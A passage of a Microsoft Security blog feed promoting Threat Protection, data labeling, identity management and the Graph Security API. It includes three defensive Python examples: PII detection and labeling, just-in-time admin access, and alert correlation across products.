Additionally, Office 365 Advanced Threat Protection (ATP) provided rich optics from PDF phish files distributed via email. When Office 365 ATP detects a suspicious file or URL in email, it can detonate the file and apply heuristics and machine learning to determine a verdict. This verdict is shared with the other services in Microsoft Threat Protection. In the case of these PDF files, all the services in Microsoft Threat Protection could immediately block the malicious PDFs because the original signal from Office 365 ATP was shared with every other service in Microsoft Threat Protection.

Microsoft Threat Protection also stops threats quickly because of its unique attributes. Every day, Microsoft sees millions of new attacks that run for just 60 minutes or less. This fast pace requires security to be automatic, in real-time, and accurate. The signal sharing and mitigation across Microsoft Threat Protection is robust and comprehensive. Below (Figure 4) is an actual timeline showing how the threat originally identified by SmartScreen provided signal to both Office ATP and Microsoft Defender ATP, which both blocked the threat.

Image of a threat timeline of a campaign from the first identification with SmartScreen to mitigations by Office ATP/Exchange Online Protection (EOP) and Microsoft Defender ATP.

Figure 4. Threat timeline of this campaign from the first identification with SmartScreen to mitigations by Office ATP/Exchange Online Protection (EOP) and Microsoft Defender ATP.

Great intelligence enables great security

Our unparalleled intelligence, seamless integration, and best-of-breed solutions for multiple attack vectors lead to the staggering numbers of threats we can detect and mitigate across multiple threat vectors. Below are statistics of the threats which Microsoft Threat Protection mitigated in 2018 (Figure 5). What’s important is not only the number of threats we’ve detected and blocked, but also the fact that we do so for threats across multiple, disparate attack vectors. This is the same strength of security you will benefit from when you implement Microsoft Threat Protection.

Image of Microsoft Threat Protection in action. Some of the detections and mitigations already offered with the solution.

Figure 5. Microsoft Threat Protection in action. Some of the detections and mitigations already offered with the solution.

Revamped website to keep you up to date

Today, we’re excited to launch our new Microsoft Threat Protection website, where you’ll find great collateral summarizing the full scope of capabilities offered by Microsoft Threat Protection. On the site, you’ll find three new webcasts where our engineers offer details and examples of:

  • Automated Incident Response—Unique SecOps capabilities only available with Microsoft.
  • Azure Sentinel—Our newly launched SIEM-as-a-service.
  • Microsoft Threat Experts and Threat and Vulnerability Management—For endpoints.

The new site also links to all the services which are part of Microsoft Threat Protection with great collateral offering details on how the individual services help secure specific attack vectors.

Experience the evolution of Microsoft Threat Protection

Hopefully, I gave you a glimpse of how Microsoft Threat Protection has already started executing on the vision of securing the modern organization. Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit our new website.

Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Begin a trial of Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution available to your organization.

The post Executing on the vision of Microsoft Threat Protection appeared first on Microsoft Security.

Safeguard your most sensitive data with Microsoft 365

I am Security Operations’ (SecOps) worst nightmare. Or at least I used to be.

As an industrious product marketer, I often share intellectual property (think: details of new product capabilities) or spreadsheets that contain customer personally identifiable information (PII) with colleagues and vendors. We need this information to create compelling marketing programs to sell our products, but if the data gets into the wrong hands, it could be devastating to the company. Like most of us in tech, my deadlines are tight and I work hard to get things done quickly.

At the beginning of my career, this included finding ways around obstacles that slowed me down, even those designed to secure sensitive information. It wasn’t that I wanted to put my company at risk, but I couldn’t do my job without sharing information with the agencies and consultants I worked with.

Most organizations employ people like (the younger) me. They have the best of intentions but may inadvertently cause a data privacy violation. Leaked data can cause reputational damage and result in big fines levied against firms that violate privacy regulations, like the General Data Protection Regulation (GDPR). The Safeguard your most sensitive data e-book sheds light on how Microsoft 365 helps employees make the right decisions about data and comply with data privacy regulations. It provides a window into the various scenarios when employees come into contact with and share sensitive data. The e-book narrates the story of Enzo, a (fictitious) sales manager, who shares and works with private data. His organization uses Microsoft 365 products to label and protect information, wherever it travels.

Label and protect data easily

Azure Information Protection can be configured to detect sensitive data in files and automatically classify and apply protections, or it can suggest labels to the file owner. You decide how much responsibility you want to give to your users and which circumstances require automatic labeling. The Safeguard your most sensitive data e-book provides examples of the different data types that can be detected and the templates that can simplify the process for both you and the user.

Protect data even when it travels

Once a file is labeled, Microsoft Cloud App Security works with Azure Information Protection to enforce protections even as it travels through third-party cloud apps and partner organizations. Azure Information Protection lets document owners define user permissions, such as limiting a specific user or domain to view access only. You can even monitor files and revoke access after they leave the enterprise ecosystem. The Safeguard your most sensitive data e-book details several real-life scenarios, so you can visualize how different capabilities can be applied to your unique situation.

Apply security policies to historical, on-premises data

For companies in the beginning or middle phases of a cloud migration, one daunting roadblock is privileged data stored in on-premises repositories. It can be difficult to determine what sensitive data has accumulated over the years and where it is stored. The Azure Information Protection scanner can be configured to scan on-premises file servers to detect PII and other sensitive data. Once the data is detected, the scanner can automatically apply labels and protection.
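The two capabilities above share one mechanism: run sensitive-information detectors over content, count the matches, and let a policy decide whether a label is applied automatically or merely recommended to the owner; the scanner simply runs the same logic over every file in a repository. The block below is an added illustration of that mechanism for this page; it is not Azure Information Protection's own engine, and the detectors (Luhn-checked card numbers, US SSN format, e-mail addresses), label names and count thresholds are assumptions chosen for the demo.

```python
"""Detect sensitive data and choose between automatic and recommended labeling.

Added example for this page, not Azure Information Protection's rules or
templates: the detectors, label names and thresholds below are assumptions.
"""
import os
import re
from typing import Dict, Optional, Tuple

# 13-16 digits, optionally separated by spaces or dashes (assumed pattern).
CREDIT_CARD = re.compile(r"\b(?:\d[ -]?){13,16}\b")
# US SSN with the invalid area/group/serial ranges excluded (assumed pattern).
US_SSN = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: weeds out random digit runs that merely look like card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_sensitive(text: str) -> Dict[str, int]:
    """Count each information type found in the text."""
    counts: Dict[str, int] = {}
    cards = [re.sub(r"[ -]", "", m.group()) for m in CREDIT_CARD.finditer(text)]
    cards = [c for c in cards if 13 <= len(c) <= 16 and luhn_ok(c)]
    if cards:
        counts["credit_card"] = len(cards)
    ssns = US_SSN.findall(text)
    if ssns:
        counts["us_ssn"] = len(ssns)
    emails = EMAIL.findall(text)
    if emails:
        counts["email"] = len(emails)
    return counts


# (information type, count that triggers auto-labeling, count that triggers a
#  recommendation, label to apply). Thresholds are assumptions for the demo.
POLICY = [
    ("credit_card", 5, 1, "Highly Confidential"),
    ("us_ssn", 5, 1, "Highly Confidential"),
    ("email", 50, 10, "Confidential"),
]
RANK = {"General": 0, "Confidential": 1, "Highly Confidential": 2}


def decide(counts: Dict[str, int]) -> Tuple[Optional[str], str]:
    """Return (label, mode); mode is 'auto', 'recommend' or 'none'.

    The most sensitive matching label wins; at equal sensitivity an automatic
    decision overrides a recommendation so a user cannot talk it down.
    """
    label: Optional[str] = None
    mode = "none"
    for info_type, auto_min, rec_min, lbl in POLICY:
        n = counts.get(info_type, 0)
        if n >= auto_min:
            m = "auto"
        elif n >= rec_min:
            m = "recommend"
        else:
            continue
        if (label is None or RANK[lbl] > RANK[label]
                or (RANK[lbl] == RANK[label] and m == "auto")):
            label, mode = lbl, m
    return label, mode


def scan_tree(root: str, exts=(".txt", ".csv", ".log")) -> Dict[str, dict]:
    """Scanner mode: apply the same policy to every text file under a repository."""
    results: Dict[str, dict] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                counts = find_sensitive(fh.read())
            label, mode = decide(counts)
            if label:
                results[os.path.relpath(path, root)] = {
                    "label": label, "mode": mode, "counts": counts}
    return results
```

The split between "auto" and "recommend" is the knob the text describes: a single card number in a support ticket gets a recommendation the owner can accept or override, while a spreadsheet full of them is labeled without asking, and the scanner output is a worklist of files to label (or encrypt) in bulk.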

Learn more

In my first marketing role at a cybersecurity company years ago, I was lucky to work with an engaged chief information security officer (CISO) who took the time to help me understand the implications of sharing sensitive data. Microsoft 365 makes it even easier to do the right thing. Azure Information Protection, Microsoft Cloud App Security, and other Microsoft 365 products remind me when I’m handling sensitive data, so I can make sure that only the people who truly need it can view it.

For more details on how you can use Microsoft 365 Enterprise E5 to keep customer and enterprise data safe, download the Safeguard your most sensitive data e-book.

Read all six e-books

The post Safeguard your most sensitive data with Microsoft 365 appeared first on Microsoft Security.

3 investments Microsoft is making to improve identity management

As a large enterprise with global reach, Microsoft has the same security risks as its customers. We have a distributed, mobile workforce who access corporate resources from external networks. Many individuals struggle to remember complex passwords or reuse one password across many accounts, which makes them vulnerable to attackers. As Microsoft has embraced digital transformation for our own business, we shifted to a security strategy that places strong employee identities at the center. Many of our customers are on a similar journey and may find value in our current identity management approach.

Our goal is to reduce the risk of compromised identity and empower people to be efficient and agile whether they’re on our network or not.

Our identity management solutions focus on three key areas:

  • Securing administrator accounts.
  • Eliminating passwords.
  • Simplifying identity provisioning.

Read on for more details for each of these investment areas, advice on scaling your investment to meet your budget, and a wrap-up of some key insights that can help you smoothly implement new policies.

Securing administrator accounts

Our administrators have access to Microsoft’s most sensitive data and systems, which makes them a target of attackers. To improve protection of our organization, it’s important to limit the number of people who have privileged access and implement elevated controls for when, how, and where administrator accounts can be used. This helps reduce the odds that a malicious actor will gain access.

There are three practices that we advise:

  • Secure devices—Establish a separate device for administrative tasks that is updated and patched with the most recent software and operating system. Set the security controls at high levels and prevent administrative tasks from being executed remotely.
  • Isolated identity—Issue an administrator identity from a separate namespace or forest that cannot access the internet and is different from the user’s information worker identity. Our administrators are required to use a smartcard to access this account.
  • Non-persistent access—Provide zero rights by default to administration accounts. Require that administrators request just-in-time (JIT) privileges that give them access for a finite amount of time, with every grant logged in a system of record.

Budget allocations may limit the amount that you can invest in these three areas; however, we still recommend that you do all three at the level that makes sense for your organization. Calibrate the level of security controls on the secure device to meet your risk profile.

Eliminating passwords

The security community has recognized for several years that passwords are not safe. Users struggle to create and remember dozens of complex passwords, and attackers excel at acquiring passwords through methods like password spray attacks and phishing. When Microsoft first explored the use of Multi-Factor Authentication (MFA) for our workforce, we issued smartcards to each employee. This was a very secure authentication method; however, it was cumbersome for employees. They found workarounds, such as forwarding work email to a personal account, that made us less safe.

Eventually we realized that eliminating passwords was a much better solution. This drove home an important lesson: as you institute policies to improve security, always remember that a great user experience is critical for adoption.

Here are steps you can take to prepare for a password-less world:

  • Enforce MFA—Adopt the FIDO2 standard, so you can require a PIN or a biometric for authentication rather than a password. Windows Hello is one good example, but choose the MFA method that works for your organization.
  • Reduce legacy authentication workflows—Place apps that require passwords into a separate user access portal and migrate users to modern authentication flows most of the time. At Microsoft only 10 percent of our users enter a password on a given day.
  • Remove passwords—Create consistency across Active Directory and Azure Active Directory (Azure AD) to enable administrators to remove passwords from the identity directory.

Simplifying identity provisioning

We believe the most underrated identity management step you can take is to simplify identity provisioning. Set up your identities with access to exactly the right systems and tools. If you provide too much access, you put the organization at risk if the identity becomes compromised. However, under-provisioning may encourage people to request access for more than they need in order to avoid requesting permission again.

We take these two approaches:

  • Set up role-based access—Identify the systems, tools, and resources that each role needs to do their job. Establish access rules that make it easy to give a new user the right permissions when you set up their account or they change roles.
  • Establish an identity governance process—Make sure that as people move roles they don’t carry forward access they no longer need.

Establishing the right access for each role is so important that, if you are only able to follow one of our recommendations, focus on identity provisioning and lifecycle management.
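The non-persistent access rule for administrators and the provisioning and governance rules above fit together in one entitlement model: standing access is derived from the role, privileged actions are reachable only through a time-boxed and logged elevation, and a role change recomputes access rather than appending to it. The block below is an added example of that model written for this page; it is not Microsoft's internal tooling, and the role catalog, JIT roles and ticket check are assumptions.

```python
"""Role-derived standing access plus just-in-time (JIT) elevation.

Added example, not Microsoft's internal tooling: the role catalog, the JIT
roles and the ticket check are assumptions chosen to show three rules from
the text: zero standing privilege, finite elevation that is logged, and no
access carried forward on a role change.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Set

# Standing access comes only from the role (assumed catalog).
ROLE_PERMISSIONS: Dict[str, Set[str]] = {
    "developer": {"repo:read", "repo:write", "ci:run"},
    "finance-analyst": {"ledger:read", "reports:read"},
    "helpdesk": {"tickets:read", "tickets:write", "user:reset-password"},
}

# Privileged permissions are never standing; they are reachable only via JIT.
JIT_ROLES: Dict[str, Set[str]] = {
    "prod-admin": {"prod:deploy", "prod:shell"},
    "tenant-admin": {"directory:write"},
}


@dataclass
class Grant:
    user: str
    jit_role: str
    expires: datetime
    ticket: str


@dataclass
class Directory:
    roles: Dict[str, str] = field(default_factory=dict)   # user -> current role
    grants: List[Grant] = field(default_factory=list)
    audit: List[str] = field(default_factory=list)

    def _log(self, now: datetime, event: str) -> None:
        self.audit.append(f"{now.isoformat()} {event}")

    def provision(self, user: str, role: str, now: datetime) -> None:
        """Create or re-point an identity; access follows from the role, not the request."""
        if role not in ROLE_PERMISSIONS:
            raise ValueError(f"unknown role {role!r}")
        self.roles[user] = role
        self._log(now, f"provision user={user} role={role}")

    def change_role(self, user: str, new_role: str, now: datetime) -> None:
        """Role move: old entitlements and any live elevation are dropped, nothing carries forward."""
        old = self.roles.get(user)
        self.provision(user, new_role, now)
        kept = [g for g in self.grants if g.user != user]
        revoked = len(self.grants) - len(kept)
        self.grants = kept
        self._log(now, f"change_role user={user} {old}->{new_role} revoked_jit={revoked}")

    def request_jit(self, user: str, jit_role: str, ticket: str, now: datetime,
                    ttl: timedelta = timedelta(hours=2)) -> Grant:
        """Time-boxed elevation; the ticket is the justification recorded with it."""
        if user not in self.roles:
            raise PermissionError("unknown identity")
        if jit_role not in JIT_ROLES:
            raise ValueError(f"unknown JIT role {jit_role!r}")
        if not ticket:
            raise PermissionError("justification ticket required")
        grant = Grant(user, jit_role, now + ttl, ticket)
        self.grants.append(grant)
        self._log(now, f"jit user={user} role={jit_role} ticket={ticket} "
                       f"until={grant.expires.isoformat()}")
        return grant

    def permissions(self, user: str, now: datetime) -> Set[str]:
        """Effective permissions right now: standing role access plus unexpired JIT grants."""
        perms = set(ROLE_PERMISSIONS.get(self.roles.get(user, ""), set()))
        for g in self.grants:
            if g.user == user and g.expires > now:
                perms |= JIT_ROLES[g.jit_role]
        return perms

    def can(self, user: str, permission: str, now: datetime) -> bool:
        return permission in self.permissions(user, now)

    def expire(self, now: datetime) -> int:
        """Housekeeping: drop lapsed grants and record each expiry in the audit trail."""
        live = [g for g in self.grants if g.expires > now]
        for g in self.grants:
            if g.expires <= now:
                self._log(now, f"jit_expired user={g.user} role={g.jit_role}")
        expired = len(self.grants) - len(live)
        self.grants = live
        return expired
```

Two details carry the security weight: `permissions` is computed from the role on every check rather than stored per user, so a role change cannot leave stale rights behind, and `JIT_ROLES` has no overlap with `ROLE_PERMISSIONS`, so no account holds a privileged permission outside an expiring, ticketed grant.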

What we learned

As you take steps to improve your identity management, keep in mind the following lessons Microsoft has learned along the way:

  • Enterprise-level cultural shifts—Getting the technology and hardware resources for a more secure enterprise can be difficult. Getting people to modify their behavior is even harder. To successfully roll out a new initiative, plan for enterprise-level cultural shifts.
  • Beyond the device—Strong identity management works hand-in-hand with healthy devices.
  • Security starts at provisioning—Don’t put governance off until later. Identity governance is crucial to ensure that companies of all sizes can audit the access privileges of all accounts. Invest early in capabilities that give the right people access to the right things at the right time.
  • User experience—We found that if you combine user experience factors with security best practices, you get the best outcome.

Learn more

For more details on how identity management fits within the overall Microsoft security framework and our roadmap forward, watch the Speaking of security: Identity management webinar.

The post 3 investments Microsoft is making to improve identity management appeared first on Microsoft Security.

Identity enhancements to support the more than 1 million active third-party applications on our platform

This week at //build 2019, we’re announcing several enhancements to our identity platform for developers. These enhancements are designed to support the more than one million active third-party applications using our identity platform each month and include:

  • Our work to unify the Microsoft identity platform across personal accounts and Azure Active Directory (Azure AD) accounts.
  • Our new unified app registrations portal.
  • The Microsoft Authentication Libraries.
  • Ability to use your GitHub identity to sign in to Microsoft products.

Head over the Identity blog for a closer look at these enhancements for developers. If you’re at //build this week stop by the Microsoft identity platform and Azure AD booths.

The post Identity enhancements to support the more than 1 million active third-party applications on our platform appeared first on Microsoft Security.

Developing connected security solutions

Many organizations deploy dozens of security products and services from Microsoft and others to combat increasing cyberthreats. As a result, the ability to quickly extract value from these solutions has become more challenging. This creates opportunity for developers to build solutions that augment and integrate security across products, services, tools, and workflows. With Gartner forecasting worldwide information security spending to exceed $124 billion by the end of 2019, the potential for developers in cybersecurity is significant and growing.

Developers at independent software vendors (ISVs), managed security providers (MSP/MSSPs), IT services and systems integrators (SIs), and enterprises can:

  • Solve integration and deployment challenges.
  • Extend capabilities to meet customer- or industry-specific needs.
  • Address security skills and staffing shortages through automation.

Using traditional paradigms, developers can build integrated apps with Microsoft APIs and SDKs. In addition, new options have emerged for security experts to develop security experiences, workflows, and analytics without writing any code. By supporting a diverse set of capabilities for security developers of all types, Microsoft enables them to:

  • Unlock value for Microsoft customers—Create solutions for the more than 19 million Microsoft Cloud customers, which includes 95 percent of Fortune 500 businesses, governments and startups.
  • Accelerate application development—Unified Microsoft Graph APIs simplify development across services and data connectors (like Azure Logic Apps, Microsoft Flow, etc.) provide code-free options. Samples and guidance make it easy to get started, and communities enable collaboration and learning.
  • Leverage the speed and scale of the Microsoft Cloud—Microsoft’s cloud platform and services enable developers to collect and analyze large amounts of varied security data and build apps at global scale.

How to develop connected security solutions

Microsoft offers a combination of APIs and services that can be used by developers. Both are supported by communities, where developers can collaborate with their peers.


By sharing security insights and taking actions in real-time, integrated apps can streamline security management, improve threat protection, and speed response. Developers can leverage Microsoft APIs and SDKs to realize end-to-end scenarios for their apps using either or both of:

  • Microsoft Graph Security API to streamline integration across multiple security solutions to enable cross-product scenarios. Microsoft Graph Security API provides a single programmatic interface with a common schema and authentication model to simplify integration for these scenarios.
  • Direct APIs and SDKs to connect to individual services to enable product-specific scenarios.
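The practical value of a common schema is that alerts from different providers can be queried with one filter and correlated with one piece of code. The block below is an added example for this page, not Microsoft sample code: it builds the OData query for the v1.0 `security/alerts` resource, pages through results, stitches alerts from different providers into incidents when they share a host or user (the "connect the dots" scenario), and shows the PATCH that moves an alert to `inProgress`. The three sample alerts are constructed, shaped like v1.0 alert objects; the live calls need a bearer token with the SecurityEvents permissions and are not exercised offline.

```python
"""Query the Microsoft Graph Security API and correlate alerts across providers.

Added example, not Microsoft sample code. SAMPLE_ALERTS are constructed
objects shaped like v1.0 security/alerts items; fetch_alerts and
mark_in_progress make live calls and need a real token.
"""
import json
import urllib.parse
import urllib.request
from collections import defaultdict
from typing import Dict, List, Set, Tuple

GRAPH = "https://graph.microsoft.com/v1.0/security/alerts"
SEVERITY_ORDER = {"unknown": 0, "informational": 0, "low": 1, "medium": 2, "high": 3}


def alerts_url(severities=("high", "medium"), status="newAlert", top=50) -> str:
    """OData query over the common alert schema; one filter covers every provider."""
    sev = " or ".join(f"severity eq '{s}'" for s in severities)
    query = {"$filter": f"({sev}) and status eq '{status}'",
             "$top": top, "$orderby": "createdDateTime desc"}
    return GRAPH + "?" + urllib.parse.urlencode(query)


def fetch_alerts(token: str) -> List[dict]:
    """Live call (needs SecurityEvents.Read.All); follows @odata.nextLink paging."""
    url, out = alerts_url(), []
    while url:
        req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}",
                                                   "Accept": "application/json"})
        with urllib.request.urlopen(req) as resp:
            page = json.load(resp)
        out.extend(page.get("value", []))
        url = page.get("@odata.nextLink")
    return out


def entity_keys(alert: dict) -> Set[Tuple[str, str]]:
    """Normalised host/user identifiers an alert touches (case-folded)."""
    keys: Set[Tuple[str, str]] = set()
    for h in alert.get("hostStates") or []:
        for f in ("fqdn", "netBiosName", "privateIpAddress"):
            if h.get(f):
                keys.add(("host", h[f].lower()))
    for u in alert.get("userStates") or []:
        for f in ("userPrincipalName", "accountName"):
            if u.get(f):
                keys.add(("user", u[f].lower()))
    return keys


def correlate(alerts: List[dict]) -> List[dict]:
    """Union-find over shared entities: alerts touching the same host or user form one incident."""
    parent = list(range(len(alerts)))

    def find(i: int) -> int:
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    first_seen: Dict[Tuple[str, str], int] = {}
    for i, alert in enumerate(alerts):
        for key in entity_keys(alert):
            if key in first_seen:
                parent[find(i)] = find(first_seen[key])
            else:
                first_seen[key] = i
    groups = defaultdict(list)
    for i in range(len(alerts)):
        groups[find(i)].append(alerts[i])
    incidents = []
    for members in groups.values():
        top = max(members, key=lambda a: SEVERITY_ORDER.get(a.get("severity"), 0))
        incidents.append({
            "severity": top.get("severity", "unknown"),
            "providers": sorted({a["vendorInformation"]["provider"] for a in members}),
            "alert_ids": [a["id"] for a in members],
            "entities": sorted(set().union(*(entity_keys(a) for a in members))),
        })
    incidents.sort(key=lambda inc: (-SEVERITY_ORDER.get(inc["severity"], 0), -len(inc["alert_ids"])))
    return incidents


def mark_in_progress(token: str, alert: dict) -> int:
    """Live PATCH; the alert's vendorInformation must be echoed back or the update is rejected."""
    body = json.dumps({"status": "inProgress",
                       "vendorInformation": alert["vendorInformation"]}).encode()
    req = urllib.request.Request(f"{GRAPH}/{alert['id']}", data=body, method="PATCH",
                                 headers={"Authorization": f"Bearer {token}",
                                          "Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return resp.status


SAMPLE_ALERTS = [  # constructed for the demo, shaped like v1.0 alert objects
    {"id": "a1", "title": "Phish email with PDF attachment delivered", "severity": "medium",
     "status": "newAlert", "createdDateTime": "2019-05-07T08:12:00Z",
     "vendorInformation": {"provider": "Office 365 ATP", "vendor": "Microsoft"},
     "hostStates": [], "userStates": [{"userPrincipalName": "alice@contoso.com"}]},
    {"id": "a2", "title": "Suspicious process launched by PDF reader", "severity": "high",
     "status": "newAlert", "createdDateTime": "2019-05-07T08:20:00Z",
     "vendorInformation": {"provider": "Windows Defender ATP", "vendor": "Microsoft"},
     "hostStates": [{"fqdn": "WS01.contoso.com", "privateIpAddress": "10.1.4.20"}],
     "userStates": [{"accountName": "alice", "userPrincipalName": "Alice@contoso.com"}]},
    {"id": "a3", "title": "Brute force attempt against SQL", "severity": "medium",
     "status": "newAlert", "createdDateTime": "2019-05-07T09:05:00Z",
     "vendorInformation": {"provider": "Azure Security Center", "vendor": "Microsoft"},
     "hostStates": [{"fqdn": "db02.contoso.com"}], "userStates": []},
]
```

Because every provider populates the same `hostStates` and `userStates` shape, the correlation code never needs to know which product raised an alert; the mail-delivery alert and the endpoint alert above join into one incident on the shared user principal name, while the unrelated database alert stays separate.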

Microsoft provides a rich set of services to power integrated security event management, analytics, investigation, and automation. Developers can build experiences, workflows, and analytics on top of the following services to deliver additional value to customers:

  • Azure Sentinel is a cloud-native Security Information and Event Management (SIEM) service. With Azure Sentinel you can connect various data sources for security monitoring and analysis, author detection queries to mitigate threats, and build workflows to enable security automation, dashboards for reporting, and machine learning models for threat detection.
  • Azure Logic Apps and Microsoft Flow—For workflow automations and orchestrations.
  • Azure Notebooks and Power BI—For analytics and reporting.

Open-source communities on GitHub enable developers to easily share code samples, detection rules, machine learning models, playbooks, tools, and more. These communities enable collaboration with other security experts to learn and share. A security developer GitHub community serves as a starting point to share code, libraries, notebooks, workbooks, and queries for connected experiences, as well as a resource to find related communities.

Get started today

Here are a few resources to help you get started:

  • A new Developer’s Guide to Building Connected Security Solutions offers a primer for those who want to build apps, workflows, and analytics that integrate with Microsoft security solutions. In addition to introducing the Microsoft APIs, services, and communities available to developers, the guide offers detailed guidance on when and how to use each one and what technology and integration option best aligns with your desired scenario and application type. Download the guide.
  • Visit the GitHub community to learn from and share with other security developers.
  • Attend the Microsoft Build session, “Building apps that integrate, automate, and manage security operations,” Wednesday, May 8, at 5 PM.

The post Developing connected security solutions appeared first on Microsoft Security.

Get security beyond Microsoft products with Microsoft 365

Over time, organizations and individuals acquire stuff. Things we love and things we need. Things we don’t need but can’t seem to get rid of. I was confronted with this challenge when we bought a 1908 craftsman home. How could I make my beloved modern furniture and mandatory kid-friendly gear work? Planning a space that pulled together the contemporary pieces with the old-world details of our home took some work, but it was worth it (and actually kind of fun). Best of all, our home has character and it feels like us.

IT organizations have also accumulated stuff over the years. Legacy systems can’t be easily replaced (like my kid-friendly furniture). Investments have been made in cloud services and security solutions to solve specific problems. It’s not always practical or even smart to replace existing products around which IT has developed processes that work. This can be a struggle for security architects striving for a single pane of glass across their security ecosystem. While they might never reach that holy grail, Microsoft 365 can get them a lot closer.

Microsoft security capabilities can extend across the entire digital landscape, including non-Microsoft products and services. Our latest e-book, Security beyond Microsoft products, illustrates how IT can secure a diverse digital estate and integrate with other security solutions to eliminate “security silos.”

Secure a diverse digital estate

The Security beyond Microsoft products e-book provides concrete examples of how Microsoft 365 security can be used to protect non-Microsoft applications and services. For example, you can use Azure Active Directory (Azure AD) to extend your sign-in policies to thousands of third-party cloud apps. Microsoft Intune secures and manages Android and Apple devices. You can even track threats across a hybrid cloud ecosystem.

Integrate with other security solutions

Microsoft 365 is a complete, intelligent solution, but it also integrates well with other security products. If you have individual security products that are still under contract or that you’ve fine-tuned for your team and processes, there is no need to lose those investments. The Security beyond Microsoft products e-book describes how Microsoft 365 works with other vendor products, such as a third-party Multi-Factor Authentication (MFA) product or a data loss prevention (DLP) solution.

Learn more

I was able to bring eclectic pieces together in a seamless, comfortable way that balanced the old and new, and you can do the same across your security organization. Learn more by downloading the first five e-books in our series:

Check back to read the final e-book in this series, “Secure your most sensitive data,” which details how Microsoft 365 can protect your data even as it travels.

The post Get security beyond Microsoft products with Microsoft 365 appeared first on Microsoft Security.

Updates for Microsoft 365 help strengthen data privacy

As data continues to grow exponentially and travel across organizational boundaries, privacy and compliance professionals play an increasingly strategic role within organizations. Several updates—announced today—for Microsoft 365 provide organizations with more control and options to strengthen their data privacy practices, including:

  • New capabilities for Microsoft 365 E5 and E5 Compliance, such as the new Office 365 Advanced Message Encryption feature, data investigation capabilities, Microsoft Teams compliance features, and a new Advanced eDiscovery experience.
  • The ability to use Compliance Manager to get automated updates of security controls and create your own assessments—including on-premises and non-Microsoft applications—against any regulation or standard, so you can manage compliance across data assets in a unified way.

To learn more about these updates, read Grow and protect your business with more privacy controls from Microsoft 365.

The post Updates for Microsoft 365 help strengthen data privacy appeared first on Microsoft Security.